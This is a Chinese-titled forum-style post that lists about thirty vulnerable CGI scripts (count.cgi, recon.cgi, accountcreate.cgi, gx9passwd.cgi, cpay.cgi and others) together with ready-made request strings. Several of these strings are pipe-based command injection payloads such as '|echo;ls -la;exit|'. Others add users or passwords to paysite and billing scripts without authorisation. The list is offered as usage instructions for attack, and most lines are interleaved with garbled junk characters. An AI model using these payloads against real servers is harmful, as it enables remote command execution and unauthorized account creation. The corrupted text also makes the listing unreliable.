Cgi-bin 30个漏洞＋使用方法

admin

==============================
  s; }! o6 ?/ ^+ h  |
0 I6 ~+ _$ K: ]. @/smspass.pl
7 Q2 o. ~) z& m) {* z  jusername=username&password=password
4 X8 R3 C6 S1 n5 ^
/index.cgi
wei=ren&gen=command
1 A4 t9 f: g. L( ~6 Z
/passmaster.cgi
, E3 Q3 V! v, Z4 F0 a; LAction=Add&Username=Username&Password=Password
  E5 A4 U& X+ ?0 E, H
5 ^, ~! d- {0 }/accountcreate.cgi
8 @0 e7 |" t. f& ]& @username=username&password=password&ref1=|echo;ls|
. ~3 }" ?; V% f* |8 [
( L3 B( o; O, y6 q; |3 @. [/form.cgi
/ B3 w, K' Z; Dname=xxxx&email=email&subject=xxxx&response=|echo;ls|

& x: q- X: X) L  d/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
0 r: Z( a% Z' ^- l% |# Z, `user=username&pass=Password&confirm=Password
+ z- G" E( ^: [4 I. v# j# B9 f
/ccbill-local.asp
post_values=username:password
' b& p: j3 u/ b4 i# W# L/ f
( p5 R6 n: _' i% h/count.cgi
* D$ B" J; C% O7 u- tpinfile=|echo;ls -la;exit|

8 |1 ]* _: T$ c; f; R" D, o/recon.cgi
$ h/ ^1 W1 J9 l) a' g5 W+ t+ u/recon.cgi?search
9 F! D) A7 ], Dsearchoption=1&searchfor=|echo;ls -al;exit|
4 i3 U/ X4 R, v: n
/verotelrum.pl
0 Y0 ^7 k0 a4 l1 ^1 jvercode=username:password:dseegsow:add:amount<&30>

0 o1 N# a' I3 x$ q4 p. X# |; J/af.cgi
_browser_out=|echo;ls -la;exit;|

9 Z4 N1 W/ N3 b$ V* R" `/modify.cgi
8 J; z0 a& n! ~% K9 ]+ Vusername=username&password=password&expire=30

+ Q6 e, q4 x' v4 c8 N4 ?/ }, U/openjournal.cgi
0 k3 |. B2 {# p  t+ Jedit=1&ct=2&go=|echo;ls -al;exit|

/gx9passwd.cgi
3 v) G# F  w% ]6 a! _4 Gcmd=ADD&user=username&pass=password

/probecontrol.cgi
' [3 {: ?4 m! O, C! k; ]& acommand=enable&username=username&password=password
9 q* M6 C# n' m, G( I
/recon.cgi
% W; g0 C; w# s4 f! V* _searchoption=3&searchfor=echo;ls -la;exit

/htadd.pl
configfile=|echo; ls -alt; exit
& r, k) Z! b* i0 a) R5 b
' W. C3 D$ b( V* Z9 r# U. ~. L( _; m$ R/gx9passwd.cgi
3 w2 _: n; L  o/ a0 Kcmd=ADD&user=username&pass=password

/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password

/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)
* Y, d1 Z+ Z( G; y! Q
/globill_ut.cgi
4 |' V2 ~9 Y5 y/ P  B* ~do=add&username=username&password=password&wpassword=password
0 |7 E) u9 A' |
0 u; v  i9 |3 v1 ]) ?+ ~/usercontrol.cgi
  I( [8 M- E3 A0 G9 ?( q1 p7 i8 {command=enable&username=USER&password=PASS
8 a1 B/ ^* r  v6 C4 S  W
/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password
1 s- N; \, v8 q& \
/addusr.pl
user=USER&pass=PASS&confirm=PASS

: S& p' z; h( ~8 s/pincount.cgi
: V) X6 N2 ~3 z" a/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|

/accountcreate.cgi
' E* Z9 n2 r% n1 A2 e/cgi-bin/gateway/accountcreate.cgi
4 w0 ]3 |3 D1 {+ cusername=username&password=password&password2=password&ref1=|echo;ls -al;exit

/af.cgi
/env.cgi
& _& k( ?% t& xADD+;echo;pwd;exit

/count.cgi
pinfile=|echo;pwd;exit|
! L: v% t9 K8 Y3 ]
/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|
) d- `# Z7 g1 s
- r5 G% r0 w$ ^0 ]$ M7 K/add.cgi
username=username&password=password&expire=30
, }3 z; h5 \0 K
==============================
" Y6 r- f# s( k, A8 \